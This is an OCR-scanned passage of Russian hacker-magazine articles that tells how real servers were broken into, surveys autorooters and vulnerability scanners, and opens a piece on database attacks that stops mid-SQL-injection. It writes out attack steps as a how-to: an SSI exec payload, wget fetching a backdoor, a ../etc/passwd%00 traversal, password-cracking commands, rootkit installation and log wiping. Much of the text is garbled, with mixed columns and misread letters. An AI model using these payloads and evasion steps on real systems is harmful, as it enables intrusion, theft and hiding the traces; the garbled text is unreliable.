баге. Чтобы выполнить подобную 
проверку, достаточно прителнетиться 
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на 80 порт и отправить стандартный 
НТТР-запрос, например, такой: 


HEAD / HTTP/1.0. 


Хакер проделал эту несложную pa- 
боту, затем пару раз нажал Enter и 
проанализировал none Server. Как 
раз в нем говорилось, что версия 
mod_php была очень древней - 4.0.6. 
Впрочем, старый релиз еще не сулил 
об успешном взломе. Например, если 
сервер крутится Ha FreeBSD, mod_php 
вообще неуязвим. Но попытка не пыт- 
ка, поэтому сетевой партизан натра- 
вил эксплоит на сервер. Строка запус- 
ка была следующей: 


„350 ип www.nikita.ru /sms/privet.php 


Бинарник требовал последний па- 
раметр в виде пути к полноценному 
скрипту. Неважно какому. Сценарий 
мог обрабатываться и рег-интерпре- 
татором, главное, чтобы скрипт по- 
нимал входные опции. После запус- 
ка эксплоит начал формировать 
смертельный запрос, приводящий к 
переполнению буфера, и отправ- 
лять его на сервер. Надо сказать, 
что это довольно длительный про- 
цесс (время зависит от ширины ка- 
нала между хакерским хостом и уяз- 
вимым сервером). Пока хакер ощу- 
пывал другие демоны, эксплоит 
блестяще справился с задачей, пре- 


Уязвимый РНР-скрипт 


доставив злоумышленнику шелл с 
правами nobody. 

Вот незадача - хакер хотел привиле- 
гий рута, а получил какого-то nobody. 
Права нужно было как-то поднимать. 
Выполнив команду cat /etc/*release, 
взломщик узнал, что на машине кру- 
тится RedHat 7.3. Затем последовала 
команда Uname -а, которая показала 
версию ядра. Кернел 2.4.24 (именно 
это ядрышко находилось в системе) 
был уязвим. Примерно год назад хаке- 
рская группа isec выпустила знамени- 
тый эксплоит для ядерной функции 
ptrace. Сплойт работал как надо и да- 
же не требовал наличия псевдотерми- 
нала (как это делали его предшест- 
венники). Но хакера поджидал неожи- 
данный облом. На сервере не было 
программы wget, которая бы позволи- 
ла нашему герою слить эксплоит на 
взломанный шелл. Впрочем, взлом- 
щик быстро решил эту проблему: за- 
лил файл прямо через консоль с по- 
мощью нехитрой команды Cat > isec.c 
<< EOF. После отправки текста с по- 
мощью сочетаний ctrIt+c, ctri+v хакер 
набрал магическое слово EOF и полу- 
чил приглашение bash. Оставалось 
только скомпилировать и запустить 
эксплоит. К счастью нашего героя, на 
кернел не было наложено патчей, по- 
этому сетевой партизан без проблем 
получил рутовые права. 

После взлома хакер должен поза- 
ботиться о собственной безопаснос- 


ти и вычистить все логи. В бинар- 
ных журналах наш герой не насле- 
gun, поэтому ему нужно было подте- 
реть /var/log/messages и еще па- 
рочку текстовых логов, а также не 
3a0bITb O WWW-xypHane access_log 
(туда здорово Hacnegun эксплоит от 
TESO). Но прежде чем манипулиро- 
вать логами, взломщик поставил на 
сервер руткит. В то время в узких 
хакерских кругах юзался комплект 
shv4. Он go сих пор приватный, поэ- 
тому ссылку я не дам :). Чтобы уста- 
новить кит, достаточно выполнить 
команду «./setup пароль порт», и на 
указанном порту откроется под- 
дельный демон sshd. Как ты gora- 
дался, пароль для соединения 
взломщик передал скрипту setup. 
Напоследок сетевой партизан напи- 


can unset HISTFILE, чтобы стереть 
лог KOMaHG, и покинул консоль. 
Прицепившись на сфейковый демон, 
хакер стер компрометирующие жур- 
налы, а также вычистил 
/var/log/www/access_log от странных 
обращений к сценарию index.php. Те- 
перь он полностью поработил сервер 
Никиты и мог делать с ним все что 
угодно :). Надо сказать, что хакер 
очень долго развлекался с этим сер- 
ваком - доступ прикрыли только пос- 
ле полной переустановки системы. 


РУССКИЙ ПРОВАЙДЕР - 
БАЖНЫЙ ПРОВАЙДЕР 

Ни один провайдер не застрахо- 
ван от уязвимостей, и российский в 
том числе. Несмотря на свежие вер- 
сии сервисов некоему взломщику 


удалось порулить сервером крупного 
московского провайдера. Удаленная 
атака была нацелена на бажный 
\АЛАЛА/-проект, в результате чего злоу- 
мышленник получил небольшие пра- 
ва на машине. Все началось с того, 
что нашего героя заинтересовал про- 
ект wtboard. Этот форум выпускается 
более пяти лет и заслужил доверие 
многих. Хакер поставил свежую вер- 
сию борды у себя на машине и начал 
над ней издеваться - искать какие-ни- 
будь баги, тестировать на различные 
WWW-ataky и т.п. Сперва у злоумыш- 
ленника ничего не получалось, но 
вскоре ему улыбнулась удача. Наш 
герой нашел бажную процедуру, кото- 
рая позволяла интерпретировать зна- 
чения системных переменных. Ска- 
жем, захочется хакеру вставить в CGI- 
поток переменную cata (она является 
системной), и результат будет роко- 
вым - изменится значение Sdata, что 
приведет к ошибке при открытии кон- 
фига. Это в лучшем случае :). В xyg- 
шем хакер просто войдет в admin-30- 
ну форума без знания пароля. Я ука- 
жу два небольших запроса, выполнив 
которые хакер оказался в админке 
форума. 


Налицо обычная подмена, в ре- 
зультате которой будет создан 
журнал /tmp/wtwrong.txt. Обраще- 
ние к нему повлечет за собой счи- 
тывание информации из Nora и дос- 


тупу к админке. $ 


John The 
Ripper уме- 
eT осущест- 
влять пере- 
бор на одни 
цифры. Для 
этого ис- 
пользуй па- 
раметр - 
i:digits. 


Brutus уме- 
ет произво- 
дить брут- 
форс как по 
ЕТР-, так и 
по НТТР- 


протоколу 
(перебор зна- 
чений раз- 
личных 
форм). Кроме 
этого, пере- 
борщик поз- 
воляет подк- 
лючать 
внешние пла- 
гины, кото- 
рые ты мо- 
жешь напи- 
сать сам :). 
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Удостоверившись, что баг работа- 
ет, хакер полез Ha google.com и отп- 
равил запрос wtboard. В ответ на по- 
исковой реквест взломщик получил 
множество ссылок. Одна из них вела 
на страницу провайдера из Москвы. 
Это очень заинтересовало нашего 
героя, и вот он проник на страницу 
администрирования. Обратившись к 
разделу темплейт-кода, злоумыш- 
ленник вбил SSI-3anpoc, выполняю- 
щий системную команду. 


<|--ехес cmd="uname -a"-->. 


Но взломщика не интересовал файл 
с аккаунтами. Он закачал wget'’oM 
простой реп-бэкдор и запустил. В ре- 
зультате на порту 37900 открылся 
шелл, стартующий /bin/sh в интерак- 
тивном режиме. Так сетевой партизан 
получил WWW-npasa. К сожалению, 
добиться рутовых привилегий оказа- 
лось непросто - ядро было пропатче- 
но фиксом от grsecurity, а система 
практически не содержала уязвимых 
сервисов (оно и понятно: дистрибутив 
носил гордое имя SlackWare :)). 


анализировал [Р-адрес, а лишь затем 
принимал решение о допуске, но да- 
же это не мешало паролям храниться 
в текстовом журнале. Так хакер обна- 
ружил пароль от логина alpha. Этот 
юзер являлся системным и имел ра- 
бочий шелл. Хакер предпочитал шпи- 
онить в консоли под полноценным 
аккаунтом, а не под web-npaBamy, по- 
этому быстро залогинился под alpha. 
Теперь он мог полноценно передви- 
гаться по домашней директории юзе- 
ра. В каталоге не было интересных 
файлов, кроме лога .bash_history. 
Взломщик всегда проверял его со- 
держимое, надеясь набрести на инте- 
ресные команды. Он поспешно отк- 
рыл журнал редактором оболочки тс 
и стал исследовать лог. В журнале 
действительно было много интерес- 
ной информации. Хакер быстро по- 
Han, что alpha следит за WWW-pecyp- 
сами, так как вся его работа проводи- 
лась в каталоге /usr/www. Помимо 
этого, работник знал пароль от су- 
перпользователя, посему активно 
юзал команду su. А зря. Иногда alpha 
ошибался в команде, а затем «сорил» 


Пароль для root занесен в историю 


показал, что на сервере крутится 
SunOS 5.9, которая по тем временам 
была самой надежной из Солярок. Со- 
ответственно, первый метод (исполь- 
зование эксплоита) отпадал сразу. 
Итак, хакер начал с WWW. Бегло прос- 


ears мо- За абсолютные права хакер готов паролем в консоль. Теперь взломщи- — мотрев скрипты, состряпанные студен- 
НРА был пойти на любые извращения. Он ку ничего не мешало поиметь закон- тами, взломщик наткнулся на занят- 
ных источ- решил попробовать один из методов ные рутовые права. Ведь OH подсмот- = ный сценарий с названием VieW.CGi, ко- 
ее эю  ПОКальной атаки, который заключает — рел пароль, а также имел нулевой торому передавался всего один пара- 
РЕ ся в поиске важных данных в систем- = 914. Последний позволял переклю- метр - название файла. По-видимому, 
просто сде- ных логах. Сперва взломщик пропар- чить права с помощью /bin/su. скрипт создавался, чтобы показывать 
mare >). сил /var/log/messages, однако ничего Одним зарутанным провайдером сишные проекты (когда взломщик 
интересного он не обнаружил. Не ду- стало больше :). Все из-за того, что ткнул по ссылке, перед ним появился 
май, что наш герой надеялся увидеть = админ вовремя не настроил фаервол. исходник файла project). Особо не Ha- 
там пароли в чистом виде. Он пролис-  Фаервол отпугивает хакера: если бы деясь на успех, наш герой изменил 
Tan messages, чтобы найти информа- alpha следил еще и за ним, то взлом- значение параметра Ha /etc/passwd, 
ея цию о каких-нибудь интересных де- щик вряд ли смог порутать WWW-cep- но это привело к фатальной ошибке. 
наше время монах. Последние любят писать акка- — вер. Хотя кто знает, ведь существует Интерпретатор ругался на то, что не 
ae ee унты в свои журналы. К сожалению, много способов обхода даже самых может найти срайл /www/students/cgi/ 
правило, поиск не увенчался успехом, поэтому — навороченных фаерволов... projects/etc/passwd.cpp. Потирая руки, 
оенар вет взломщик перешел в каталог . сетевой партизан еще раз поменял 
нестандарт- _— /uST/www/logs и открыл редактором ВТОРЖЕНИЕ К БУРЖУЙСКИМ значение опции на «../../../../../etc/pass- 
ным поис- документ access_log. Дело в том, что СТУДЕНТАМ wd%00», и сервер без проблем пока- 
росы, EL на провайдерском сервере крутился и Бывает, что хакер находит баг, ко- зал сфайл с аккаунтами. Почему так 


биллинг, позволяющий просмотреть 
состояние счета. Все бы ничего, да 
вот только соединение инициирова- 
лось по небезопасному протоколу, а 
в качестве метода передачи исполь- 
зовался СЕТ. Все условия для отлова 
паролей. Кстати, обычные пользова- 
тели в биллинг не пускались - скрипт 
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торый не позволяет поднять привиле- 
гии без использования какого-нибудь 
заковыристого метода. Так случилось 
при взломе сервера одного иноземно- 
го университета trinity.edu. Хакер даже 
не знал, в какой точке планеты этот 
университет, он ломал сервер по зака- 


произошло? Все просто: из-за нулево- 
го байта расширение «.срр» не было 
приплюсовано к открываемому доку- 
менту - функции ореп0 передавался 
файл /etc/passwd%00.cpp, что факти- 
чески открывало системный passwd. 
Взломщик увидел, что в системе 


зу. Надо сказать, взлом не обошелся 
без использования самого хардкорно- 
го метода. Сперва хакер начал скани- 
ровать Web. Так вышло, что на роуте- 
ре стоял фаервол, дфильтрующий все 
порты, кроме 21, 22 и 80. Баннер FTPD 


прописаны порядка сотни учетных за- 
писей. В таком случае целесообразно 
применить перебор на пару 
«login:login», ведь особо одаренные 
студенты любят устанавливать па- 
роль, равный логину (либо не зада- 
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Все аккаунты как на ладони! 
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lee iene 


вать его вообще). Хакер скормил име- 
на студентов специальному скрипту и 
передал список пар переборщику 
Brutus. В качестве сервиса был выб- 
ран FTP, ибо другие порты ‹фильтро- 
вались сетевым экраном. Спустя пару 
минут, Brutus сообщил, что несколько 
студентов действительно выбрали па- 
роль, равный логину. Не медля наш 
герой прицепился к шеллу no SSH и 
был готов к повышению своих прав. 

Поиск инорормации в логах ни к чему 
путному не привел. Доступ к историям 
команд админов был закрыт от посто- 
ронних глаз, логи студентов-ламеров 
не содержали ничего интересного. На- 
конец, взломщик вспомнил, что па- 
роль может содержаться в .htpasswd. 
Команда locate .htpasswd показала три 
подобных конорига. Два из них имели 
атрибут 400, а последний не содержал 
полезных хэшей (в документе храни- 
лась строка дчезЕ пароль, но юзер 
guest вообще не присутствовал в 
/etc/passwd). Второй поисковый зап- 
рос был направлен на нахождение 
конфигов .htaccess. Их было больше, 
и почти все хакер мог посмотреть. В 
одном из таких срайлов наш герой на- 
шел ссылку на базу с паролями, кото- 
рый назывался .5есиге. В нем он обна- 
ружил все юзерские хэши. Этакий дуб- 
ликат /etc/shadow. Оставалось взять 
из него рутовый пароль и расшифро- 
вать его прогой John The Ripper. Джо- 
ник запускался на мощной 4-процес- 
сорной тачке, которую хакер купил за 
$100 якобы для математических вы- 
числений :). Bpytcpopcep запускался в 
трех режимах - single, wordlist и all. 
Стартовый скрипт, который обращался 
к John, содержал всего три строки. 
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Brutus готов к работе 


start.sh - запуск John The Ripper в раз- 
ных режимах 


/john -single passwd >> crk_passwd 

./john -w:big_wordlist.txt -rules passwd >> 
crk_passwd 

/john -i:all passwd >> crk_passwd 


Загрузив все четыре камня, взломщик 
отошел от компа, надеясь, что к его 
возвращению пароль успешно раскрип- 
туется. Спустя час пароль действитель- 
но был расшисрован. Взломщику по- 
везло: в качестве пароля выступало 
слово «StreetOO». Кстати, подобное сло- 
вечко было получено благодаря опции - 
rules, которая извращает словарные 
слова, подставляя к ним всякие нулики 
и меняя регистр букв. Вот, собственно и 
все. Теперь злоумышленник вошел на 
сервер под рутом, благо sshd разрешал 
подобные операции. Проверив, что па- 
роль действительно совпадает с систем- 
ным, наш герой обменял системный ак- 
каунт на пару сотен WMZ. 


ХОЧЕШЬ ЕЩЕ? 

п Все комбинации методов взлома в 
рамках одного материала не описать. 
Бывают случаи, когда взломщику при- 
ходится удивляться неработоспособ- 
ности атак, отработанных годами. По- 
добные аномалии случаются, если на 
сервере стоит какая-нибудь антихаке- 
рская приблуда (например, IDS). Слу- 
чается, что бдительные админы сразу 
пресекают хакерские действия, отк- 
лючая узел от сети. Если хочешь 
быть в курсе грамотных взломов, ре- 
комендую читать ежемесячную руб- 
рику «Нашумевшие истории крупных 
взломов» в журнале Х. 
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В НОМЕРЕ: 


Тестирование новейших 
моделей КПК, ноутбуков 
и сотовых телефонов 


Как превратить мобильный 
телефон в телевизор 

Новая услуга компании 
МЕГАФОН 


Переносим данные 

с ноутбука 

Наши эксперты знают — 
копирование файлов с 
мобильной системы на 
настольную может быть 
легким и приятным занятием! 


ШАГ ЗА ШАГОМ 


* Обновляем прошивку КПК 

* 1510 4.05 — лучшая «читалка» 
теперь и на РРС 

* Чтение русскоязычных 
СНМ-файлов на КПК 

® Карманный звукооператор — 
VITO Sound Editor 1.4. 

* Дистанционное управление 
МИпАтр СКК — ; 

¢ FileMan — лучший файловый 
менеджер для Symbian OS 


(game)! on 


www.mobilecomputers.ru 


ОХОТА ЗА БАГАМИ ) 


Докучаев Дмитрий aka Forb (forb@real.xake 


свои нужды. 


дом нового юзера с правами админа 
:)), им оставляемых на машине-жерт- 
ве. Избавиться от этого достаточно 
серьезного изъяна можно путем мо- 
дифицирования shell-koga (подроб- 
нее об этом читай в Спеце 
#08.04(45)), например, встроив в не- 
го код, создающий LKM для сокры- 
тия присутствия хакера и т.п. 

Не менее распространенными в ха- 


керских кругах являются сканеры 


баг теряет актуальность, либо пубпи- 
куют в урезанном варианте. Собран- 
ную мною коллекцию, уже довольно 
старенькую, ты сможешь найти на 
моем сайте (http://kamensk.net.ru/forb/). 


ОПОЗНАТЬ И ВЗЛОМАТЬ! 

п Хотелось бы рассказать о неко- 
торых нашумевших в свое время 
авторутерах. Даже если какой-ни- 
будь из них уже потерял былую ак- 

туальность, никто не 


помешает тебе переде- 
лать его под новый 
баг. 

С год назад я добыл 
аккаунт на каком-то ха- 
керском ЕТР и вытащил 
оттуда файл nog назва- 
нием mass-scan.tar.gz. В 
архиве оказался авто- 
рутер, да не простой, а 
комбинированный. 
Эксплуатировал автору- 
тер целых четыре уяз- 
вимости в bind, |ра, ftpd 


и грс.*! Последний баг, 
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ш есмотря на то что багов в сети крутится огромное количество, поиск уязвимой машины вручную - дело достаточно 
= [=] HygHoe и долгое. Время, как известно, деньги, поэтому логично, что взломщики процесс поиска всячески 
автоматизируют. И воображение их не ограничивается банальным сканером портов под Windows :). 
ь. 
аботу хакера выполня- безопасности. В отличие от автору- кстати, gO сих пор актуален для древ- 
ют многочисленные тера, сканер - менее активный них машинок Ha SunOS, IRIX и HP-UX. 
сканеры безопасности, инструмент, после обнаружения В общем, такой мощный пакет заслу- 
рутеры и прочие отно- уязвимости он оповещает о ней живал доверия. Но, как известно, все 
сительно интеллекту- злоумышленника (интерактивно ли- познается на практике, поэтому я ре- 
альные утилиты. Они круглыми сутка- бо через лог), а не использует тот- шил проверить работу этого автору- 
ми трудятся на шеллах и десктопах, час же эксплоит. Предмет сканиро- тера. Мне пришлось поставить на 
старательно записывая каждую най- вания может быть любым: WWW- свою машину дырявый РгоЕТРО, а за- 
денную уязвимость в журнал. скрипт, порт дырявого демона, хост тем натравить на него бинарник rOOt. 
О том, какие реализации автомати- или даже целая подсеть! Даже не просто натравить, а заста- 
зированного поиска багов встречают- Помимо сканеров и «комплектов вить просканировать весь сегмент. 
ся, я поведаю далее. злых бинарников» существуют гиб- Автоматизированная система выдер- 
кие эксплоиты. Принцип их работы жала все испытания и успешно спра- 
ИХ РАЗЫСКИВАЮТ ХАКЕРЫ немного схож с алгоритмом автору- вилась с задачей, взломав меня без 
m Начнем с классификации софта тера, однако весь вражеский код за- каких-либо проблем. 
для поиска уязвимостей. шит в один-единственный сфайл. Следующий интересный авторутер 
Самыми популярными программка- Гибкий эксплоит тоже сканирует не- использовал известный баг в 
ми являются авторутеры. В их зада- который диапазон адресов на Npeg- OpenSSH. Ты, наверное, помнишь 
чу входит сканирование указанного мет уязвимости и применяет свой множество поколений эксплоита Х2. 
Обладая не- диапазона адресов на предмет уяз- арсенал для всех найденных тачек. Так вот, комплект xssh.tgz содержал в 
В вимой службы, проникновение на Под Windows отличным примером та- себе сплоит x2, а также два бинарни- 
програм- сервер с помощью эксплоита, добав- кой программки служил бы kaht2 ка: Xnet и Xirc. 
РР ление нового пользователя с О-уи- (RPC ОСОМ-эксплоит). Xnet - обычный сканер, совмещен- 
a Ey дом и запись информации в журнал. Самое обидное, что автоматические ный с эксплоитом, при запуске он ис- 
модифици- Главным недостатком подобного сканеры и авторутеры редко попада- кал в заданном диапазоне |Р-адресов 
ЕН софта является огромное количест- ют в публичные источники. Как пра- хост с нужным демоном и пытался его 
тер под во следов (если можно назвать сле- вило, их выкладывают, только когда порутать. В случае успеха эксплоит 


автоматически добавлял нового юзе- 
ра на машине жертвы, сообщал об 
этом к себе в пог и продолжал поиск. 

Xirc делал нечто куда более ориги- 
нальное. Он заходил в IRC и пытался 
найти жертву там! Xirc join'unca на оп- 
ределенный канал и проверял всех 
присутствующих на предмет уязви- 
мости в OpenSSH. Найдя ее, запускал 
эксплоит и далее по тому же принци- 
пу, что и в Xnet. 

Этот авторутер успешно тестиро- 
вался мной в локальной сети одного 
университета. Практически все демо- 
ны в университетской локалке были 
уязвимы, поэтому Хпе{ подарил мне 
целых шесть рутов! 


СКАНИРОВАНИЕ МЕСТНОСТИ 

m Но на все уязвимости авторуте- 
ров не напасешься, да и обнару- 
жить их все не так-то уж просто. 
Тут на помощь приходят сканеры 
безопасности. 

Под *пх-системы существует много 
различных сканеров, но самый изве- 
CTHbI из них - NESSUS. Этот пакет сос- 


TOM. Именно с по- 
мощью grabbb я искал 
уязвимые FTPD. 

Также не могу не 
рассказать о чудесном 
сканере strobe, кото- 
рый gO недавнего Bpe- 
мени вообще был при- 
ватным. Он необходим 
при определении не- 
известного сервиса на 
открытом порте (пор- 
тах). Кстати, strobe и 
grabbb объединяет 
один недостаток - не- 
возможность сканиро- 
вания диапазонов се- 
тевых адресов. И тот, 
и другой сканеры по- 
нимают лишь отдель- 


ные [Р-адреса, кото- 


тоит из двух частей - серверной и 
клиентской. Перед тем как сканиро- 
вать сеть на уязвимости, необходимо 
сконфигурировать nessusd.conf и 
создать нового пользователя (коман- 
gon nessus-adduser). Затем можно за- 
пускать демон пеззи$4 с параметром - 
р (в режиме демона). Далее с наст- 
ройкой можно разобраться и без бу- 
тылки: запускаем клиент и в удобных 
Иксах конфигурируем параметры 
nessus. Не забудь указать логин и па- 
роль того юзера, которого ты создал 
консольным Nessus-adduser. Пожа- 
луй, после этих шагов NESSUS готов к 
автоматизированному сканированию. 
К каждому найденному багу прилага- 
ется подробное описание включая 
ссылку на багтрак, так что ты всегда 
будешь знать, каким эксплоитом 
можно атаковать дырявого пингвина! 
Следующий хакерский сканер помо- 
жет найти уязвимость по заданному 
баннеру. Известный grabbb от ТЕЗО 
умеет сканировать сетевую мест- 
ность с записью в журнал баннеров 
указанных служб - стоит лишь запус- 
тить его в бэграунд с полным логгин- 


рые генерируются спе- 
циальными утилитами с последую- 
щей записью в специальный host- 
файл. Как ты догадался, этот файл 
и передается сканеру в качестве па- 
раметра. 

Strobe умеет находить активный 
порт и комментировать сервис исхо- 
ga из записи в /etc/services. Отсут- 
ствие всяких рюшечек и тюнингов, 
надо признать, очень неплохо отра- 
зилось на скорости поиска - в тесто- 
вом режиме strobe просканировал 
254 адреса всего за 20 секунд (ска- 
нирование велось по пяти портам). 

И, наконец, классика. Не стоит за- 
бывать о таких монстрах, как птар. 
Этот проект не даром засветился во 
второй «Матрице»: он прочно во- 
шел в доверие многих хакеров. Ты и 
без меня знаешь достоинства птар: 
сканирование в различных режи- 
мах, поддержка диапазонов адре- 
сов и портов, спуфинг адреса отп- 
равителя и многое другое. Если ты 
еще не юзал птар на практике - не- 
медленно иди на 
и бери свежий релиз сканера. Не 
пожалеешь :). 


НЕ ЗАБУДЬ ПРО WINDOWS! 


КОМПАКТНЫЕ ПАРТИЗАНЫ 

Я уже упоминал выше о "продви- 
нутых" эксплоитах, которые изредка 
мелькают на сайтах, посвященных 
компьютерной безопасности. Они поз- 
вопяют не только порутать сервер, но 
и просканить диапазон адресов на баг. 
К сожалению, обычно подобные вещи 
ориентированы Ha \/п-уязвимости, по- 
этому ты наверняка вообще не слы- 
шал об автоэксплоитах для Linux. 

Тем не менее, подобные вещи есть. 
Одна из них называется linux_lprn- 
gautorooter. Этот эксплоит ориенти- 
рован Ha баг в Ipr. Скомпилирован- 
ный бинарник выполняет сканирова- 
ние подсети, а затем атакует нужный 
сервер. После успешного эксплуати- 
рования Iprgautorooter открывает 
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рутовый шелл. Естественно, что все 
действия сразу же заносятся в лог 
взломщика. 

Обращаю твое внимание на то, что 
большинство подобных компактных 
авторутеров пишутся хакерами-энту- 
зиастами. Поэтому ты без проблем 
можешь выдрать нужный код скане- 
ра из исходника и прикрутить его к 
другому эксплоиту. 


ОТДАМ В ХОРОШИЕ РУКИ 

На этом наше знакомство с прог- 
раммами, автоматизирующими поиск 
уязвимостей, завершается. Весь упо- 
мянутый сост ты можешь скачать с 

. Даже 

если какой-либо баг, реализованный 
в авторутерах или автоэксплоитах, 
уже потерял актуальность, никто не 
мешает тебе попробовать адаптиро- 
вать их под новые уязвимости. 


Будь осто- 
рожен! Не- 
которые ав- 
торутеры 
отсылают 
информа- 
цию не 
только те- 
бе, нои 
своему ав- 
тору :). 


64 БАЗА ДАННЫХ ПОД ПРИЦЕЛОМ ) 


Крис Касперски аКа мыщьх 


БАЗА ДАННЫХ 
ПОД ПРИЦЕЛОМ 


ВЗЛОМ БД 


+ МХ 


анные - это основа всего. Тут и номера кредитных карт, и личная информация пользователей, и сведения об 
Д угнанных машинах. Содержимое чатов и форумов тоже хранится в БД. Проникновение в корпоративную (военную, 
правительственную) базу данных - самое худшее, что только может случиться с компанией. Поразительно, но даже 
критические сервера зачастую оказываются никак не защищены и взламываются 12-летними любителями командной 
строки без особых усилий. 
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ервера баз данных OT- 


носятся к наиболее 


критичным информа- 


ционным ресурсам и 
потому должны разме- 
щаться на выделенном сервере, рас- 
положенном во внутренней корпора- 
тивной сети, огражденной маршрути- 
затором или брандмауэром. Взаимо- 
действие с базами данных обычно 
осуществляется через Web-cepBep, 
находящийся внутри ОМ7-зоны. 

Размещать сервер базы данных на 
одном узле с Web-cepBepom категори- 
чески недопустимо не только по тех- 
ническим, но и по юридическим сооб- 
ражениям (законодательства многих 
стран диктуют свою политику обра- 
щения с конфиденциальными данны- 
ми, особенно если эти данные хранят 
информацию о клиентах компании). 
Тем не менее, совмещение сервера 
БД с Web-cepBepom довольно обыч- 
но из-за экономии. Захватив управле- 
ние Web-cepBepom (а практически ни 
одному Web-cepBepy не удалось из- 
бежать ошибок переполнения буфе- 
ра и прочих дыр), атакующий получит 
доступ ко всем данным, хранящимся 
в базе! 

Сервер БД, как и любой другой сер- 
вер, подвержен ошибкам проектиро- 
вания, среди которых доминируют пе- 
реполняющиеся буфера, позволяю- 
щие атакующему захватывать управ- 
ление удаленной машиной с Hacnego- 
ванием администраторских привиле- 
гий. Яркий пример тому - уязвимость, 
обнаруженная в сервере MS SQL u 
ставшая причиной крупной вирусной 
эпидемии. Не избежал этой участи и 
MySQL. Версия 3.23.31 падала на зап- 
росах типа select 
а.ААААААА...АААААА.Б, а на соответ- 
ствующим образом подготовленных 
строках - передавала управление на 
shell-kog, причем атаку можно было 
осуществить и через браузер, пере- 
дав в URL уязвимому для 5ОЕ-инъек- 
ции скрипту что-то типа: 
script.php?index=a.(shell-code).b. 

Однако даже защищенный бранод- 
мауэром SQL-cepBep может быть ата- 
кован через уязвимый скрипт или 
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нестойкий механизм аутентифика- 
ции. Разумеется, я не могу рассказать 
обо всех существующих атаках, но 
продемонстрирую пару-тройку из- 
любленных хакерских приемов. 


НЕСТОЙКОСТЬ ШИФРОВАНИЯ 
ПАРОЛЕЙ 

m= Пароли, регламентирующие дос- 
туп к базе данных, ни при каких обс- 
тоятельствах не должны передавать- 
ся открытым текстом по сети. Вместо 
пароля передается его хэш, зашиф- 
рованный случайно сгенерированной 
последовательностью байт и называ- 
емый проверочной строкой (check- 
string). Короче говоря, реализуется 
классическая схема аутентификации, 
устойчивая к перехвату информации 
и при этом не допускающая ни подбо- 
ра пароля, ни его декодирования, во 
всяком случае, в теории. 

На практике же во многих серверах 
БД обнаруживаются грубые ошибки 
проектирования. Взять хотя бы 
MySQL версии 3.x. Хэш-функция, ис- 
пользуемая для "сворачивания" па- 
роля, возвращает 64-разрядную ко- 
дированную последовательность, в 
то время как длина случайно генери- 
руемой строки (гапаот-$ па) состав- 
ляет всего лишь 40 бит. Как cneg- 
ствие, шифрование не полностью 
удаляет всю избыточную информа- 
цию и анализ большого количества 
перехваченных check-string/random- 
string позволяет восстановить исход- 
ный хэш (пароль восстанавливать не 
требуется, так как для аутентисфика- 
ции он не нужен). 

В несколько упрощенном виде про- 
цедура шифрования выглядит так: 


seedl = seed! + (3*5 


seed2 = see 
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r[i] = floor((seed1/n)*31) + 64; 


checksum =(r[1]4r[9] || r[2]*r[9] || 
7)*r[9] || r£8]*r9}); 


Нестойкие механизмы аутентисфика- 
ции встречались и в других серверах, 
однако к настоящему моменту практи- 
чески все они давно ликвидированы. 


ПЕРЕХВАТ ПАРОЛЯ 

и Для авторизации на сайте в по- 
давляющем большинстве случаев ис- 
пользуются нестойкие механизмы 
аутентификации, разработанные не- 
посредственно самим \\еБ-мастером и 
передающие пароль в открытом виде. 
Как следствие, он может быть легко 
перехвачен злоумышленником, заб- 
росившим на одну из машин внутрен- 
ней сети или ОМ7-зоны снифер или 
создавшим точную копию атакуемого 
Web-cepBepa, для заманивания довер- 
чивых пользователей - тогда логин и 
пароль они введут сами. 

Многие сервера хранят информа- 
цию об авторизации в кукисах 
(cookie), находящихся на машинах 
удаленных пользователей, и, вмес- 
то того чтобы ломиться на хорошо 
защищенный корпоративный сер- 
вер, взломщик может атаковать ни- 
кем не охраняемые клиентские уз- 
лы. Главная трудность заключается 
в TOM, что их сетевые координаты 
наперед неизвестны и атакующему 
приходится тыкаться вслепую. 
Обычно эта проблема решается 
массированной рассылкой почтовой 
корреспонденции с троянизирован- 
ным вложением внутри по многим 
адресам - если повезет, то среди 
пользователей, доверчиво запус- 
тивших трояна, окажется хотя бы 
один корпоративный клиент. Hy a 
извлечь куки - уже дело техники. 

Некоторые серверы баз данных (в 
частности, ранние версии М5 $01), 
автоматически устанавливают пароль 
по умолчанию, предоставляющий 


полный доступ к базе и позволяющий 
делать с ней что угодно (у MS SQL 
этот пароль "за"). 


НАВЯЗЫВАНИЕ ЗАПРОСА, 
ИЛИ $01-ИНЪЕКЦИЯ 

и Типичный сценарий взаимодей- 
ствия с базой данных выглядит так: 
пользователь вводит некоторую ин- 
формацию в поля запроса, оттуда 
ее извлекает специальный скрипт и 
преобразует в строку запроса к ба- 
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зе данных, передавая серверу ее на 
выполнение: 


Sresult = mysql_db_query("database", 
"select * from userTable 
where login = 
'SuserLogin' and password = 
‘SuserPassword! "); 


Здесь Suserlogin - переменная, со- 
держащая имя пользователя, а 
SuserPassword - его пароль. Обрати 
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Инструментарий для наблюдений за SQL 


ВСКРЫТИЕ СКРИПТА 


ante 


Ш Нормально работающий Web-cepBep никогда He выдает исход- 
ный код скрипта, а только результат его работы. Между тем, везде- 
сущие ошибки реализации приводят к тому, что код скрипта в не- 
которых случаях все-таки становится доступным, причем виновни- 
ком может быть как сервер, так и обрабатываемый им скрипт. Есте- 
ственно, в скриптах ошибки встречаются намного чаще, поскольку 
их пишут все кому не лень, порой не имея никакого представления 
о безопасности. Серверы же проходят более или менее тщательное 
тестирование, и основные дыры обнаруживаются еще на началь- 


ной стадии. 


Подробнее об этом можно прочитать в моей статье "Безопасное 
программирование на языке Рег!" (kpnc.opennet.ru/safe.perl.zip). 

Исследуя тело скрипта, можно нарыть немало интересного, напри- 
мер, имена полей, названия таблиц, мастер-пароли, хранящиеся 


открытым текстом, ит.д. 


if ($filename eq "passwd") 


#проверка имени на корректность 


внимание, что обе переменные разме- 
щены внутри текстовой строки, окайм- 
ленной кавычками. Это необычно для 
Си, но типично для интерпретируемых 
языков вроде Рег и РНР. Подобный 
механизм называется интерполяцией 
строк и позволяет автоматически 
подставлять вместо переменной ее 
фактическое значение. 

Допустим, пользователь введет 
КРМС/разз\ма. Тогда строка запроса 
будет выглядеть так: "select * from 
userTable where login = 'KPNC' and 
password = 'passwd'". 

Если такой логин/пароль действи- 
тельно присутствует в базе, функция 
сообщает идентификатор результа- 
та, в противном случае возвращает- 
ся FALSE. 

Хочешь войти в систему под именем 
другого пользователя, зная его логин, 
но не зная пароль? Воспользуйся 
тем, что механизм интерполяции поз- 
воляет атакующему воздействовать 
на строку запроса, видоизменяя ее по 
своему усмотрению. Посмотрим, что 
произойдет, если вместо пароля ввес- 
ти последовательность "fuck' ог \'= 
